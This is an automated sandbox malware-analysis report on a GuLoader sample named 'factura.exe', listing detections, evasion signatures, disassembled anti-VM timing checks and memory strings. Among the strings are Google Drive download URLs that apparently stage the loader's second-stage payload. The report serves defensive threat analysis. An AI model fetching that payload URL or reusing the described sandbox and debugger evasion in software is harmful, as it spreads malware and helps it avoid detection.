Loading ...

Play interactive tourEdit tour

Analysis Report factura.exe

Overview

General Information

Sample Name:factura.exe
Analysis ID:384277
MD5:5950cbe94b3b5dedbf7b75fa1b95ac84
SHA1:797bb1231483bb11279f6e63fbb5d675bda58f2a
SHA256:73f2aa87dad06704e8bbd41fb7449a987dc089160a12ba5e13d7d7f6f4196a4f
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Potential malicious icon found
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • factura.exe (PID: 7088 cmdline: 'C:\Users\user\Desktop\factura.exe' MD5: 5950CBE94B3B5DEDBF7B75FA1B95AC84)
    • RegAsm.exe (PID: 5420 cmdline: 'C:\Users\user\Desktop\factura.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)
    • RegAsm.exe (PID: 5388 cmdline: 'C:\Users\user\Desktop\factura.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)
      • conhost.exe (PID: 5392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    Process Memory Space: RegAsm.exe PID: 5388JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: factura.exeVirustotal: Detection: 49%Perma Link
      Source: factura.exeMetadefender: Detection: 27%Perma Link
      Source: factura.exeReversingLabs: Detection: 45%
      Source: factura.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C035C9 InternetReadFile,15_2_00C035C9
      Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
      Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
      Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
      Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
      Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmpString found in binary or memory: http://pki.g
      Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
      Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmp, RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp, RegAsm.exe, 0000000F.00000002.1031906231.00000000010A0000.00000004.00000020.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
      Source: RegAsm.exe, 0000000F.00000002.1031906231.00000000010A0000.00000004.00000020.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/dU
      Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
      Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/A
      Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/Mw#
      Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/S
      Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/s
      Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbe
      Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbe4J
      Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbe8J
      Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbeOj
      Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbeWJ
      Source: RegAsm.exe, 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbef
      Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbehJ
      Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbepJ
      Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbewmBbjvsikSdqvbetubek
      Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbeyJ
      Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpString found in binary or memory: https://pki.goog/repository/0

      System Summary:

      barindex
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Source: C:\Users\user\Desktop\factura.exeProcess Stats: CPU usage > 98%
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C001DE EnumWindows,NtSetInformationThread,15_2_00C001DE
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C031B1 NtProtectVirtualMemory,15_2_00C031B1
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C00219 NtSetInformationThread,15_2_00C00219
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C0352C NtProtectVirtualMemory,15_2_00C0352C
      Source: C:\Users\user\Desktop\factura.exeCode function: 0_2_0040169C0_2_0040169C
      Source: factura.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: factura.exe, 00000000.00000002.1021965132.0000000002230000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamekvalifikationen.exeFE2XCollutionsCollutions vs factura.exe
      Source: factura.exe, 00000000.00000002.1021965132.0000000002230000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamekvalifikationen.exeFE2XCollutions vs factura.exe
      Source: factura.exe, 00000000.00000002.1021965132.0000000002230000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamekvalifikationen.exeFE2XCollutions( vs factura.exe
      Source: factura.exe, 00000000.00000002.1021965132.0000000002230000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamekvalifikationen.exeFE2XCollutionsW vs factura.exe
      Source: factura.exe, 00000000.00000000.637238818.000000000040E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamekvalifikationen.exe vs factura.exe
      Source: factura.exe, 00000000.00000002.1021928094.00000000021E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs factura.exe
      Source: factura.exeBinary or memory string: OriginalFilenamekvalifikationen.exe vs factura.exe
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dllJump to behavior
      Source: factura.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@4/0@0/0
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5392:120:WilError_01
      Source: factura.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\factura.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\factura.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: factura.exeVirustotal: Detection: 49%
      Source: factura.exeMetadefender: Detection: 27%
      Source: factura.exeReversingLabs: Detection: 45%
      Source: unknownProcess created: C:\Users\user\Desktop\factura.exe 'C:\Users\user\Desktop\factura.exe'
      Source: C:\Users\user\Desktop\factura.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\factura.exe'
      Source: C:\Users\user\Desktop\factura.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\factura.exe'
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: Window RecorderWindow detected: More than 3 window changes detected

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5388, type: MEMORY
      Source: C:\Users\user\Desktop\factura.exeCode function: 0_2_00403542 push ebx; ret 0_2_00403557
      Source: C:\Users\user\Desktop\factura.exeCode function: 0_2_0040657D push FFFFFFC2h; iretd 0_2_004065A9
      Source: C:\Users\user\Desktop\factura.exeCode function: 0_2_004065AB push FFFFFFC2h; iretd 0_2_004065A9
      Source: C:\Users\user\Desktop\factura.exeCode function: 0_2_00403E6A pushad ; ret 0_2_00403E6B
      Source: C:\Users\user\Desktop\factura.exeCode function: 0_2_00401E38 push esp; retf 0040h0_2_00401E39
      Source: C:\Users\user\Desktop\factura.exeCode function: 0_2_00403ED0 push esp; retf 0_2_00403EDA
      Source: C:\Users\user\Desktop\factura.exeCode function: 0_2_00403E90 push esp; retf 0_2_00403EDA
      Source: C:\Users\user\Desktop\factura.exeCode function: 0_2_00403F18 push esp; retf 0_2_00403EDA
      Source: C:\Users\user\Desktop\factura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\factura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\factura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\factura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\factura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C00AE8 LoadLibraryA,15_2_00C00AE8
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\factura.exeRDTSC instruction interceptor: First address: 0000000000411A41 second address: 0000000000411A41 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F99E4842F68h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 dec ecx 0x00000021 cmp ecx, 00000000h 0x00000024 jne 00007F99E4842F51h 0x00000026 cmp ah, dh 0x00000028 push ecx 0x00000029 call 00007F99E4842F79h 0x0000002e call 00007F99E4842F78h 0x00000033 lfence 0x00000036 mov edx, dword ptr [7FFE0014h] 0x0000003c lfence 0x0000003f ret 0x00000040 mov esi, edx 0x00000042 pushad 0x00000043 rdtsc
      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_15-1808
      Tries to detect Any.runShow sources
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: RegAsm.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\factura.exeRDTSC instruction interceptor: First address: 0000000000412C6A second address: 0000000000412C0B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b retn 0004h 0x0000000e cmp edx, dword ptr [esp+04h] 0x00000012 jne 00007F99E4842F34h 0x00000014 cmp edx, edx 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 lfence 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\factura.exeRDTSC instruction interceptor: First address: 0000000000412B18 second address: 0000000000412A79 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, dword ptr [ebp+14h] 0x0000000e add esi, dword ptr [ebp+04h] 0x00000011 mov esi, dword ptr [esi+eax*4] 0x00000014 add esi, dword ptr [ebp+04h] 0x00000017 mov dword ptr [ebp+08h], esi 0x0000001a retn 0004h 0x0000001d pushad 0x0000001e lfence 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\factura.exeRDTSC instruction interceptor: First address: 0000000000411A41 second address: 0000000000411A41 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F99E4842F68h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 dec ecx 0x00000021 cmp ecx, 00000000h 0x00000024 jne 00007F99E4842F51h 0x00000026 cmp ah, dh 0x00000028 push ecx 0x00000029 call 00007F99E4842F79h 0x0000002e call 00007F99E4842F78h 0x00000033 lfence 0x00000036 mov edx, dword ptr [7FFE0014h] 0x0000003c lfence 0x0000003f ret 0x00000040 mov esi, edx 0x00000042 pushad 0x00000043 rdtsc
      Source: C:\Users\user\Desktop\factura.exeRDTSC instruction interceptor: First address: 0000000000411B03 second address: 0000000000411B03 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F99E4D9C4AAh 0x0000001d popad 0x0000001e call 00007F99E4D9B20Bh 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\factura.exeRDTSC instruction interceptor: First address: 0000000000412BA9 second address: 0000000000412BA9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push dword ptr [eax+ecx] 0x0000000e pop dword ptr [ebx+ecx] 0x00000011 cmp bx, ax 0x00000014 test cx, 1B46h 0x00000019 inc ecx 0x0000001a inc ecx 0x0000001b inc ecx 0x0000001c inc ecx 0x0000001d cmp dl, bl 0x0000001f cmp ecx, 18h 0x00000022 jne 00007F99E4842F38h 0x00000024 cmp edx, edx 0x00000026 pushad 0x00000027 lfence 0x0000002a rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000C02C6A second address: 0000000000C02C0B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b retn 0004h 0x0000000e cmp edx, dword ptr [esp+04h] 0x00000012 jne 00007F99E4D9B1C4h 0x00000014 cmp edx, edx 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 lfence 0x0000001c rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000C02B18 second address: 0000000000C02A79 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, dword ptr [ebp+14h] 0x0000000e add esi, dword ptr [ebp+04h] 0x00000011 mov esi, dword ptr [esi+eax*4] 0x00000014 add esi, dword ptr [ebp+04h] 0x00000017 mov dword ptr [ebp+08h], esi 0x0000001a retn 0004h 0x0000001d pushad 0x0000001e lfence 0x00000021 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000C01B03 second address: 0000000000C01B03 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F99E4D9C4AAh 0x0000001d popad 0x0000001e call 00007F99E4D9B20Bh 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C02A2C rdtsc 15_2_00C02A2C
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5448Thread sleep time: -40000s >= -30000sJump to behavior
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWX
      Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
      Source: RegAsm.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWMA=v

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C001DE NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0000000015_2_00C001DE
      Found potential dummy code loops (likely to delay analysis)Show sources
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess Stats: CPU usage > 90% for more than 60s
      Hides threads from debuggersShow sources
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C02A2C rdtsc 15_2_00C02A2C
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C01D57 LdrInitializeThunk,15_2_00C01D57
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C00AE8 mov eax, dword ptr fs:[00000030h]15_2_00C00AE8
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C00E25 mov eax, dword ptr fs:[00000030h]15_2_00C00E25
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C00FE2 mov eax, dword ptr fs:[00000030h]15_2_00C00FE2
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C02BEE mov eax, dword ptr fs:[00000030h]15_2_00C02BEE
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C01996 mov eax, dword ptr fs:[00000030h]15_2_00C01996
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C029BD mov eax, dword ptr fs:[00000030h]15_2_00C029BD
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 15_2_00C02F5D mov eax, dword ptr fs:[00000030h]15_2_00C02F5D
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: RegAsm.exe, 0000000F.00000002.1031956172.00000000014E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: RegAsm.exe, 0000000F.00000002.1031956172.00000000014E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: RegAsm.exe, 0000000F.00000002.1031956172.00000000014E0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: RegAsm.exe, 0000000F.00000002.1031956172.00000000014E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsNative API1DLL Side-Loading1Process Injection2Virtualization/Sandbox Evasion321OS Credential DumpingSecurity Software Discovery821Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection2LSASS MemoryVirtualization/Sandbox Evasion321Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)DLL Side-Loading1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSystem Information Discovery31Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      factura.exe49%VirustotalBrowse
      factura.exe30%MetadefenderBrowse
      factura.exe46%ReversingLabsWin32.Trojan.GuLoader

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
      http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
      http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
      http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
      http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
      http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
      http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
      http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
      https://pki.goog/repository/00%URL Reputationsafe
      https://pki.goog/repository/00%URL Reputationsafe
      https://pki.goog/repository/00%URL Reputationsafe
      https://pki.goog/repository/00%URL Reputationsafe
      http://pki.g0%Avira URL Cloudsafe
      http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
      http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
      http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
      http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://pki.goog/gsr2/GTS1O1.crt0RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      http://crl.pki.goog/gsr2/gsr2.crl0?RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      https://pki.goog/repository/0RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      http://pki.gRegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://crl.pki.goog/GTS1O1core.crl0RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:31.0.0 Emerald
      Analysis ID:384277
      Start date:08.04.2021
      Start time:20:43:47
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 43s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:factura.exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
